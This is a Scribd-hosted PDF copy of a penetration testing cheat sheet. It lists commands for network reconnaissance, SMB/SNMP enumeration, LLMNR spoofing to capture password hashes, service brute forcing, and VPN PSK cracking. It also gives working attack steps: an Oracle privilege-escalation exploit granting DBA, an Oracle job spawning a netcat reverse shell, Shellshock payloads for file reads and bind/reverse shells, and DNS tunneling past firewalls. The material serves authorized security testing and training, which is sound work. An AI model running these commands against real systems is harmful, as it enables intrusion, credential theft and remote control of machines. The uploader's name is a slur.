Scribd
Upload
54 views85 pages

Penetration Testing Tools Cheat Sheet

The document is a comprehensive cheat sheet for penetration testing tools, providing a high-level overview of commands and techniques used in typical penetration testing engagements, particularly focused on infrastructure and network testing. It includes sections on pre-engagement tasks, OSINT, enumeration, vulnerability assessment, and various tools and commands for different testing scenarios. Additionally, it offers recommendations for further reading and resources for more specific penetration testing needs.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
54 views85 pages

Penetration Testing Tools Cheat Sheet

The document is a comprehensive cheat sheet for penetration testing tools, providing a high-level overview of commands and techniques used in typical penetration testing engagements, particularly focused on infrastructure and network testing. It includes sections on pre-engagement tasks, OSINT, enumeration, vulnerability assessment, and various tools and commands for different testing scenarios. Additionally, it offers recommendations for further reading and resources for more specific penetration testing needs.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 85

HOME BLOG

All Blog
Penetration Testing Tools Cheat Sheet ∞ Cheat Sheets
Techniques
Security Hardening
CHEAT-SHEET 17 Feb 2017 Arr0way
WalkThroughs
Introduction
CHEAT SHEETS

Penetration testing tools cheat sheet, a quick reference high level Penetra on Tes ng Tools
overview for typical penetra on tes ng engagements. Designed as a Cheat Sheet
quick reference cheat sheet providing a high level overview of the LFI Cheat Sheet
Vi Cheat Sheet
typical commands you would run when performing a penetra on test.
Systemd Cheat Sheet
For more in depth informa on I’d recommend the man file for the tool or Reverse Shell Cheat
a more specific pen tes ng cheat sheet from the menu on the right. Sheet
nbtscan Cheat Sheet
The focus of this cheat sheet is infrastructure / network penetra on Nmap Cheat Sheet
tes ng, web applica on penetra on tes ng is not covered here apart Linux Commands Cheat
Sheet
from a few sqlmap commands at the end and some web server
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
enumera on. For Web Applica on Penetra on Tes ng, I highly More »

recommend this book, it is excellent for both learning and reference.


WALKTHROUGHS

If I’m missing any pen tes ng tools here give me a nudge on twi er.
InsomniHack CTF Teaser
- Smartcat2 Writeup
Changelog InsomniHack CTF Teaser
- Smartcat1 Writeup
17/02/2017 - Ar cle updated, added loads more content, VPN, DNS Fris Leaks 1.3
tunneling, VLAN hopping etc - check out the TOC below. Walkthrough
SickOS 1.1 -
Walkthrough
Table of Contents
The Wall Boot2Root
Introduc on
Walkthrough
Changelog
More »
Pre-engagement
Network Configura on TECHNIQUES
Set IP Address
Subne ng SSH & Meterpreter
Pivo ng Techniques
OSINT
More »
Passive Informa on Gathering
DNS SECURITY HARDENING
WHOIS enumera on
Perform DNS IP Lookup Security Harden CentOS
Perform MX Record Lookup 7
More »

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Perform Zone Transfer with DIG /DEV/URANDOM

DNS Zone Transfers


Email MacBook - Post Install
Simply Email Config + Apps
More »
Semi Ac ve Informa on Gathering
Basic Finger Prin ng
OTHER BLOG
Banner grabbing with NC
Ac ve Informa on Gathering HowTo: Kali Linux
DNS Bruteforce Chromium Install for
DNSRecon Web App Pen Tes ng
Jenkins RCE via
Port Scanning
Unauthen cated API
Nmap Commands
MacBook - Post Install
Nmap UDP Scanning
Config + Apps
UDP Protocol Scanner enum4linux Cheat Sheet
Other Host Discovery Linux Local Enumera on
Script
Enumera on & A acking Network Services
HowTo Install Quassel on
SAMB / SMB / Windows Domain Enumera on
Ubuntu
Samba Enumera on
HowTo Install KeepNote
SMB Enumera on Tools
on OSX Mavericks
Fingerprint SMB Version
Find open SMB Shares

Enumerate SMB Users


Manual Null session tes ng:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
NBTScan unixwiz

LLMNR / NBT-NS Spoofing


Metasploit LLMNR / NetBIOS requests
Responder.py

SNMP Enumera on Tools


SNMPv3 Enumera on Tools
R Services Enumera on
RSH Enumera on
RSH Run Commands

Metasploit RSH Login Scanner


rusers Show Logged in Users

rusers scan whole Subnet


Finger Enumera on
Finger a Specific Username

Solaris bug that shows all logged in users:


rwho

TLS & SSL Tes ng


testssl.sh
Vulnerability Assessment

Database Penetra on Tes ng


Oracle
Fingerprint Oracle TNS Version

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Brute force oracle user accounts

Oracle Privilege Escala on


Iden fy default accounts within oracle db using NMAP NSE scripts:
How to iden fy the current privilege level for an oracle user:

Oracle priv esc and obtain DBA access:


Run the exploit with a select query:

Remove the exploit using:


Get Oracle Reverse os-shell:

MSSQL
Bruteforce MSSQL Login
Metasploit MSSQL Shell

Network
Plink.exe Tunnel
Pivo ng
SSH Pivo ng

Meterpreter Pivo ng
TTL Finger Prin ng

IPv4 Cheat Sheets


Classful IP Ranges
IPv4 Private Address Ranges

IPv4 Subnet Cheat Sheet

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
VLAN Hopping

VPN Pentes ng Tools


IKEForce
IKE Aggressive Mode PSK Cracking
Step 1: Ideni y IKE Servers

Step 2: Enumerate group name with IKEForce


Step 3: Use ike-scan to capture the PSK hash

Step 4: Use psk-crack to crack the PSK hash


PPTP Hacking
NMAP PPTP Fingerprint:

PPTP Dic onary A ack


DNS Tunneling
A acking Machine

BOF / Exploit
Exploit Research
Searching for Exploits

Compiling Windows Exploits on Kali


Cross Compiling Exploits

Exploi ng Common Vulnerabili es


Exploi ng Shellshock
cat file (view file contents)
Shell Shock run bind shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Shell Shock reverse Shell

Simple Local Web Servers


Moun ng File Shares

HTTP / HTTPS Webserver Enumera on


Packet Inspec on

Username Enumera on
SMB User Enumera on
SNMP User Enumera on

Passwords
Wordlists
Brute Forcing Services
Hydra FTP Brute Force

Hydra POP3 Brute Force


Hydra SMTP Brute Force

Password Cracking
John The Ripper - JTR
Windows Penetra on Tes ng Commands

Linux Penetra on Tes ng Commands


Compiling Exploits
Iden fying if C code is for Windows or Linux

Build Exploit GCC

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
GCC Compile 32Bit Exploit on 64Bit Kali

Compile Windows .exe on Linux


SUID Binary
SUID C Shell for /bin/bash

SUID C Shell for /bin/sh


Building the SUID Shell binary

Reverse Shells
TTY Shells
Python TTY Shell Trick

Spawn Interac ve sh shell


Spawn Perl TTY Shell

Spawn Ruby TTY Shell


Spawn Lua TTY Shell

Spawn TTY Shell from Vi


Spawn TTY Shell NMAP

Metasploit Cheat Sheet


Meterpreter Payloads
Windows reverse meterpreter payload

Windows VNC Meterpreter payload


Linux Reverse Meterpreter payload

Meterpreter Cheat Sheet

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)

Local Windows Metasploit Modules (exploits)


Auxilary Metasploit Modules

Metasploit Powershell Modules


Post Exploit Windows Metasploit Modules

ASCII Table Cheat Sheet


CISCO IOS Commands

Cryptography
Hash Lengths
Hash Examples

SQLMap Examples

Pre-engagement
Network Con guration

Set IP Address

ifconfig eth0 xxx.xxx.xxx.xxx/24

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Subnetting

ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0

OSINT
Passive Information Gathering

DNS

WHOIS enumeration

whois domain-name-here.com

Perform DNS IP Lookup

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
dig a domain-name-here.com @nameserver

Perform MX Record Lookup

dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG

dig axfr domain-name-here.com @nameserver

DNS Zone Transfers


COMMAND DESCRIPTION

nslookup -> set type=any -> ls -d blah.com Windows DNS zone transfer

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
dig axfr blah.com @ns1.blah.com Linux DNS zone transfer

Email

Simply Email

Use Simply Email to enumerate all the online places (github, target site
etc), it works be er if you use proxies or set long thro le mes so google
doesn’t think you’re a robot and make you fill out a Captcha.

git clone https://github.com/killswitch-GUI/SimplyEmail.git


./SimplyEmail.py -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresss a er gathering.

Semi Active Information Gathering

Basic Finger Printing

Manual finger prin ng / banner grabbing.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
COMMAND DESCRIPTION

nc -v 192.168.1.1 25
Basic versioning / finger prin ng via displayed banner
telnet 192.168.1.1 25

Banner grabbing with NC

nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>

Active Information Gathering

DNS Bruteforce

DNSRecon

DNS Enumeration Kali - DNSRecon

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
root:~#
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --
xml ouput.xml

Port Scanning

Nmap Commands

For more commands, see the Nmap cheat sheet (link in the menu on the
right).

Basic Nmap Commands:

COMMAND DESCRIPTION

Nmap verbose scan, runs syn


stealth, T4 ming (should be ok on
nmap -v -sS -A -T4 target LAN), OS and service version info,
traceroute and scripts against
services

As above but scans all TCP ports


nmap -v -sS -p--A -T4 target
(takes a lot longer)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
As above but scans all TCP ports
nmap -v -sU -sS -p- -A -T4 target
and UDP scan (takes even longer)

Nmap script to scan for vulnerable


nmap -v -p 445 --script=smb-check-vulns
SMB servers - WARNING: unsafe=1
--script-args=unsafe=1 192.168.1.X
may cause knockover

ls /usr/share/nmap/scripts/* | grep ftp Search nmap scripts for keywords

I’ve had a few people men on about T4 scans, apply common sense
here. Don’t use T4 commands on external pen tests (when using an
Internet connec on), you’re probably be er off using a T2 with a TCP
connect scan. A T4 scan would likely be be er suited for an internal pen
test, over low latency links with plenty of bandwidth. But it all depends
on the target devices, embeded devices are going to struggle if you T4 /
T5 them and give inconclusive results. As a general rule of thumb, scan
as slowly as you can, or do a fast scan for the top 1000 so you can start
pen tes ng then kick off a slower scan.

Nmap UDP Scanning

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
nmap -sU TARGET

UDP Protocol Scanner

git clone https://github.com/portcullislabs/udp-proto-scanner.git

Scan a file of IP addresses for all services:

./udp-protocol-scanner.pl -f ip.txt

Scan for a specific UDP service:

udp-proto-scanner.pl -p ntp -f ips.txt

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Other Host Discovery

Other methods of host discovery, that don’t use nmap…

COMMAND DESCRIPTION

Discovers IP, MAC Address and MAC vendor on


netdiscover -r 192.168.1.0/24 the subnet from ARP, helpful for confirming
you're on the right VLAN at $client site

Enumeration & Attacking Network Services


Penetra on tes ng tools that spefically iden fy and / or enumerate
network services:

SAMB / SMB / Windows Domain Enumeration

Samba Enumeration

SMB Enumeration Tools

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Also see, nbtscan cheat sheet (right hand menu).

COMMAND DESCRIPTION

Discover Windows / Samba servers on subnet, finds


nbtscan 192.168.1.0/24 Windows MAC addresses, netbios name and discover
client workgroup / domain

Do Everything, runs all op ons (find windows client


enum4linux -a target-ip domain / workgroup) apart from dic onary based share
name guessing

Fingerprint SMB Version

smbclient -L //192.168.1.100

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Find open SMB Shares

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser

Enumerate SMB Users

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-25

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID Cycling:

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Metasploit module for RID cycling:

use auxiliary/scanner/smb/smb_lookupsid

Manual Null session testing:

Windows:

net use \\TARGET\IPC$ "" /u:""

Linux:

smbclient -L //192.168.99.131

NBTScan unixwiz

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Install on Kali rolling:

apt-get install nbtscan-unixwiz


nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS Spoo ng

Steal creden als off the network.

Metasploit LLMNR / NetBIOS requests

Spoof / poison LLMNR / NetBIOS requests:

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response

Capture the hashes:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Responder.py

Alterna vely you can use responder.

git clone https://github.com/SpiderLabs/Responder.git


python Responder.py -i local-ip -I eth0

★ Run Responder.py for the whole engagement


Run Responder.py for the length of the engagement while you're working on other attack
vectors.

SNMP Enumeration Tools

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
A number of SNMP enumera on tools.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs


echo "" > /etc/snmp/snmp.conf

COMMAND DESCRIPTION

snmpcheck -t 192.168.1.X -c public


snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f SNMP enumera on
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

SNMPv3 Enumeration Tools

Ideni y SNMPv3 servers with nmap:

nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Rory McCune’s snmpwalk wrapper script helps automate the username
enumera on process for SNMPv3:

apt-get install snmp snmp-mibs-downloader


wget https://raw.githubusercontent.com/raesene/TestingScripts/master

★ Use Metasploits Wordlist


Metasploit's wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for
newer credentials check out Daniel Miessler's SecLists project on GitHub (not the mailing
list!).

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R Services Enumeration

This is legacy, included for completeness.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
nmap -A will perform all the rservices enumera on listed below, this
sec on has been added for completeness or manual confirma on:

RSH Enumeration

RSH Run Commands

rsh <target> <command>

Metasploit RSH Login Scanner

auxiliary/scanner/rservices/rsh_login

rusers Show Logged in Users

rusers -al 192.168.2.1

rusers scan whole Subnet


Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
rlogin -l <user> <target>

e.g rlogin -l root TARGET-SUBNET/24

Finger Enumeration

finger @TARGET-IP

Finger a Speci c Username

finger batman@TARGET-IP

Solaris bug that shows all logged in users:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
finger 0@host

SunOS: RPC services allow user enum:


$ rusers # users logged onto LAN

finger 'a b c d e f g h'@sunhost

rwho

Use nmap to iden fy machines running rwhod (513 UDP)

TLS & SSL Testing


testssl.sh

Test all the things on a single host and output to a .html file:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUT

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Vulnerability Assessment
Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup

Verify openvas is running using:

netstat -tulpn

Login at h ps://127.0.0.1:9392 - creden als are generated during


openvas-setup.

Database Penetration Testing


Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
A acking database servers exposed on the network.

Oracle

Install oscanner:

apt-get install oscanner

Run oscanner:

oscanner -s 192.168.1.200 -P 1521

Fingerprint Oracle TNS Version

Install tnscmd10g:

apt-get install tnscmd10g

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Fingerprint oracle tns:

tnscmd10g version -h TARGET


nmap --script=oracle-tns-version

Brute force oracle user accounts

Iden fy default Oracle accounts:

nmap --script=oracle-sid-brute
nmap --script=oracle-brute

Run nmap scripts against Oracle TNS:

nmap -p 1521 -A TARGET

Oracle Privilege Escalation

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Requirements:

Oracle needs to be exposed on the network


A default account is in use like sco

Quick overview of how this works:

1. Create the func on


2. Create an index on table SYS.DUAL
3. The index we just created executes our func on SCOTT.DBA_X
4. The func on will be executed by SYS user (as that’s the user that
owns the table).
5. Create an account with DBA priveleges

In the example below the user SCOTT is used but this should be possible
with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
nmap --script=oracle-sid-brute
nmap --script=oracle-brute

Login using the iden fied weak account (assuming you find one).

How to identify the current privilege level for an oracle user:

SQL> select * from session_privs;

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar de


curren_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;

Oracle priv esc and obtain DBA access:


Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Run netcat: netcat -nvlp 443 code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));

Run the exploit with a select query:

SQL> Select * from session_privs;

You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:

drop index exploit_1337;

Get Oracle Reverse os-shell:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
begin
dbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,sta
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;

MSSQL

Enumera on / Discovery:

Nmap:

nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Metasploit:

msf > use auxiliary/scanner/mssql/mssql_ping

★ Use MS SQL Servers Browse For More


Try using "Browse for More" via MS SQL Server Management Studio

Bruteforce MSSQL Login

msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payload


msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Network
Plink.exe Tunnel

PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP

Pivoting

SSH Pivoting

ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SSH pivo ng from one network to another:

ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

Meterpreter Pivoting

TTL Finger Printing

OPERATING SYSTEM TTL SIZE

Windows 128

Linux 64

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Solaris 255

Cisco / Network 255

IPv4 Cheat Sheets

Classful IP Ranges

E.g Class A,B,C (depreciated)

CLASS IP ADDRESS RANGE

Class A IP Address Range 0.0.0.0 - 127.255.255.255

Class B IP Address Range 128.0.0.0 - 191.255.255.255

Class C IP Address Range 192.0.0.0 - 223.255.255.255

Class D IP Address Range 224.0.0.0 - 239.255.255.255

Class E IP Address Range 240.0.0.0 - 255.255.255.255

IPv4 Private Address Ranges

CLASS RANGE

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Class A Private Address Range 10.0.0.0 - 10.255.255.255

Class B Private Address Range 172.16.0.0 - 172.31.255.255

Class C Private Address Range 192.168.0.0 - 192.168.255.255

127.0.0.0 - 127.255.255.255

IPv4 Subnet Cheat Sheet

Subnet cheat sheet, not really realted to pen tes ng but a useful
reference.

CIDR DECIMAL MASK NUMBER OF HOSTS

/31 255.255.255.254 1 Host

/30 255.255.255.252 2 Hosts

/29 255.255.255.249 6 Hosts

/28 255.255.255.240 14 Hosts

/27 255.255.255.224 30 Hosts

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
/26 255.255.255.192 62 Hosts

/25 255.255.255.128 126 Hosts

/24 255.255.255.0 254 Hosts

/23 255.255.254.0 512 Host

/22 255.255.252.0 1022 Hosts

/21 255.255.248.0 2046 Hosts

/20 255.255.240.0 4094 Hosts

/19 255.255.224.0 8190 Hosts

/18 255.255.192.0 16382 Hosts

/17 255.255.128.0 32766 Hosts

/16 255.255.0.0 65534 Hosts

/15 255.254.0.0 131070 Hosts

/14 255.252.0.0 262142 Hosts

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
/13 255.248.0.0 524286 Hosts

/12 255.240.0.0 1048674 Hosts

/11 255.224.0.0 2097150 Hosts

/10 255.192.0.0 4194302 Hosts

/9 255.128.0.0 8388606 Hosts

/8 255.0.0.0 16777214 Hosts

VLAN Hopping

Using NCCGroups VLAN wrapper script for Yersina simplifies the


process.

git clone https://github.com/nccgroup/vlan-hopping.git


chmod 700 frogger.sh
./frogger.sh

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
VPN Pentesting Tools

Iden fy VPN servers:

./udp-protocol-scanner.pl -p ike TARGET(s)

Scan a range for VPN servers:

./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce

Use IKEForce to enumerate or dic onary a ack VPN servers.

Install:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumera on with IKEForce:

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:

./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.t

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking

1. Iden fy VPN Servers


2. Enumerate with IKEForce to obtain the group ID
3. Use ike-scan to capture the PSK hash from the IKE endpoint

4. Use psk-crack to crack the hash

Step 1: Idenitfy IKE Servers

./udp-protocol-scanner.pl -p ike SUBNET/24

Step 2: Enumerate group name with IKEForce

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Step 3: Use ike-scan to capture the PSK hash

ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP

Step 4: Use psk-crack to crack the PSK hash

psk-crack hash-file.txt

Some more advanced psk-crack op ons below:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcde
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking

Iden fying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:

nmap –Pn -sV -p 1723 TARGET(S)

PPTP Dictionary Attack

thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
DNS Tunneling

Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for ge ng files


(data and programs) to and from the target machine.

Attacking Machine

Install on:

apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:

h ps://downloads.skullsecurity.org/dnscat2/
h ps://github.com/lukebagge /dnscat2-powershell/

dnscat --host <dnscat server_ip>

BOF / Exploit

Exploit Research
Find exploits for enumerated hosts / services.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
COMMAND DESCRIPTION

Search exploit-db for exploit, in


searchsploit windows 2003 | grep -i local this example windows 2003 +
local esc

Use google to search exploit-


site:exploit-db.com exploit kernel <= 3
db.com for exploits

Search metasploit modules


grep -R "W7" /usr/share/metasploit-framework
using grep - msf search sucks a
/modules/exploit/windows/*
bit

Searching for Exploits

Install local copy of exploit-db:

searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali


Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)


gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker

./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin

cat le (view le contents)

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo

Shell Shock run bind shell

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Shell Shock reverse Shell

nc -l -p 443

Simple Local Web Servers


Python local web server command, handy for serving up shells and
exploits on an a acking machine.

COMMAND DESCRIPTION

Run a basic h p server, great


python -m SimpleHTTPServer 80
for serving up shells etc

Run a basic Python3 h p


python3 -m http.server server, great for serving up
shells etc

ruby -rwebrick -e "WEBrick::HTTPServer.new Run a ruby webrick basic


(:Port => 80, :DocumentRoot => Dir.pwd).start" h p server

php -S 0.0.0.0:80 Run a basic PHP h p server

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND DESCRIPTION

Mount NFS share to


mount 192.168.1.1:/vol/share /mnt/nfs
/mnt/nfs

Mount Windows CIFS /


SMB share on Linux at
/mnt/cifs if you remove
mount -t cifs -o username=user,password=pass
password it will prompt on
,domain=blah //192.168.1.X/share-name /mnt/cifs
the CLI (more secure as it
wont end up in
bash_history)

Mount a Windows share on


net use Z: \\win-server\share password
Windows from the
/user:domain\janedoe /savecred /p:no
command line

Install smb4k on Kali, useful


apt-get install smb4k -y Linux GUI for browsing
SMB shares

HTTP / HTTPS Webserver Enumeration


Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
COMMAND DESCRIPTION

nikto -h 192.168.1.1 Perform a nikto scan against target

dirbuster Configure via GUI, CLI input doesn't work most of the me

Packet Inspection
COMMAND DESCRIPTION

tcpdump for port 80 on interface


tcpdump tcp port 80 -w output.pcap -i eth0
eth0, outputs to output.pcap

Username Enumeration
Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

COMMAND DESCRIPTION

python /usr/share/doc/python-impacket-doc/examples Enumerate users from


/samrdump.py 192.168.XXX.XXX SMB

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
RID cycle SMB /
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt enumerate users from
SMB

SNMP User Enumeration

COMMAND DESCRIPTION

snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25 Enmerate users


|cut -d” “ -f4 from SNMP

python /usr/share/doc/python-impacket-doc/examples/ Enmerate users


samrdump.py SNMP 192.168.X.XXX from SNMP

Search for SNMP


nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt servers with
(then grep) nmap, grepable
output

Passwords
Wordlists

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
COMMAND DESCRIPTION

/usr/share/wordlists Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

COMMAND DESCRIPTION

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f Hydra FTP brute


192.168.X.XXX ftp -V force

Hydra POP3 Brute Force

COMMAND DESCRIPTION

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f Hydra POP3 brute


192.168.X.XXX pop3 -V force

Hydra SMTP Brute Force

COMMAND DESCRIPTION

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Hydra SMTP
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V
brute force

Use -t to limit concurrent connec ons, example: -t 15

Password Cracking
Password cracking penetra on tes ng tools.

John The Ripper - JTR

COMMAND DESCRIPTION

JTR password
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
cracking

JTR forced
john --format=descrypt --wordlist
descrypt cracking
/usr/share/wordlists/rockyou.txt hash.txt
with wordlist

JTR forced
john --format=descrypt hash --show descrypt brute
force cracking

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
